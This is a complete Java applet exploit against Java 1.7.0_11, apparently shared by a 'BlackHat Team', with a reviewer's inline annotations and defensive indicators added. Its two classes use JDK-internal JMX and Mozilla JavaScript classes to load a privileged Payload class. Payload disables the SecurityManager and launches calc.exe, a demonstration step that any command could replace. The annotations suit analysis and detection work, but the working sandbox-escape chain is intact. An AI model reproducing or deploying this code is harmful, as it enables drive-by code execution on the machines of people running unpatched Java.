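- /*
- * (Java 1.7.0_11 Exploit)
- *
- * Ngetes doank :v   [Indonesian: "just testing"]
- *
- * http://www.facebook.com/Gabby.IndoNesian.BlackHat.Team
- *
- * Review note: the listing below is an applet sandbox-escape proof of concept in
- * two source files. PaunchGift resolves JDK-internal classes by name through
- * com.sun.jmx.mbeanserver, uses them to define the bundled Payload class, and
- * Payload then calls System.setSecurityManager(null) inside doPrivileged().
- * Defensive takeaways: keep the JRE patched past the version named above, disable
- * the Java browser plug-in or make it click-to-play, and treat any applet that
- * imports com.sun.jmx.mbeanserver.* or carries the string names of
- * sun.org.mozilla.javascript.internal.* classes as hostile.
- */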
- import java.applet.Applet;
- import com.sun.jmx.mbeanserver.Introspector;
- import com.sun.jmx.mbeanserver.JmxMBeanServer;
- import com.sun.jmx.mbeanserver.MBeanInstantiator;
- import java.lang.invoke.MethodHandle;
- import java.lang.invoke.MethodHandles.Lookup;
- import java.lang.invoke.MethodType;
- import java.lang.reflect.InvocationTargetException;
- import java.lang.reflect.Method;
- import javax.management.ReflectionException;
- import java.io.*;
- public class PaunchGift extends Applet // Applet entry class of the proof of concept: defines the bundled Payload.class through JDK-internal classes resolved by name.
- { // Static indicators visible in this class: imports of com.sun.jmx.mbeanserver.* and the string names of sun.org.mozilla.javascript.internal classes.
- public void init() // Overrides Applet.init(); the whole chain below runs from this one method and reports nothing on failure.
- {
- try
- {
- int length;
- byte[] buffer = new byte[5000];
- ByteArrayOutputStream os = new ByteArrayOutputStream();
- // read in the class file from the jar
- InputStream is = getClass().getResourceAsStream("Payload.class"); // never closed; a missing resource yields null and the resulting NPE is swallowed by the catch below
- // and write it out to the byte array stream
- while( ( length = is.read( buffer ) ) > 0 )
- os.write( buffer, 0, length );
- // convert it to a simple byte array
- buffer = os.toByteArray();
- Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context"); // resolved by name via gimmeClass(), never referenced as a type
- Method method = getMethod(class1, "enter", true); // flag=true: only a zero-argument "enter" is accepted
- Object obj = method.invoke(null, new Object[0]); // static call (null receiver); the result is the receiver for createClassLoader below
- Method method1 = getMethod(class1, "createClassLoader", false);
- Object obj1 = method1.invoke(obj, new Object[1]); // called with a single null argument
- Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
- Method method2 = getMethod(class2, "defineClass", false);
- Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer }); // defines a class from the Payload.class bytes (name argument null); presumably outside the applet's restricted protection domain - confirm against the JDK build under test
- my_class.newInstance(); // runs Payload's constructor; the instance itself is discarded
- Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
- m_outSandbox.invoke(null, new Object[] {}); // static call; in this paste outSandbox() starts calc.exe
- }
- catch (Throwable localThrowable){} // every failure, including Errors, is swallowed: this code prints no stack trace and logs nothing
- }
- private Method getMethod(Class class1, String s, boolean flag) // Returns the first declared method of class1 named s (zero-argument only when flag is true), or null if none matches or the lookup throws.
- {
- try {
- Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods"); // method array is obtained through the JMX Introspector; this class never calls class1.getDeclaredMethods() itself
- Method[] amethod1 = amethod;
- for (int i = 0; i < amethod1.length; i++) {
- Method method = amethod1[i];
- String s1 = method.getName();
- Class[] aclass = method.getParameterTypes();
- if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method; // NOTE(review): the name check is a reference comparison (==), not equals()
- }
- } catch (Exception localException) { } // lookup failures are swallowed; the caller then receives null
- return null;
- }
- private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException // Resolves class name s through a JMX MBeanInstantiator's findClass instead of calling Class.forName(s) from applet code.
- {
- Object obj = null; // passed below as the ClassLoader argument of findClass
- JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
- MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
- Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
- Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
- return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj }); // findClass(s, null) invoked reflectively on the instantiator
- }
- }
- ###############################################
- import java.lang.reflect.Method;
- import java.security.AccessController;
- import java.security.PrivilegedExceptionAction;
- public class Payload implements PrivilegedExceptionAction // Second-stage class: its constructor requests a privileged action whose run() clears the JVM's SecurityManager.
- {
- public Payload() // All work happens in the constructor, so instantiating the class is enough to trigger run().
- {
- try
- {
- AccessController.doPrivileged(this); // executes run() below as a privileged action
- }
- catch(Exception exception) { } // failures are ignored; nothing is logged
- }
- public Object run() throws Exception // PrivilegedExceptionAction callback; always returns null.
- {
- Class cl = System.class;
- Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
- m.invoke(null, new Object[1]); // equivalent to System.setSecurityManager(null): removes the installed SecurityManager if the caller is permitted to
- return null;
- }
- public static void outSandbox() throws Exception // Demonstration action: starts a local process, which a SecurityManager-enforced applet sandbox normally denies.
- {
- Runtime.getRuntime().exec("calc.exe"); // Windows Calculator; a child process spawned by the Java plug-in or browser JVM is a useful detection signal
- }
- }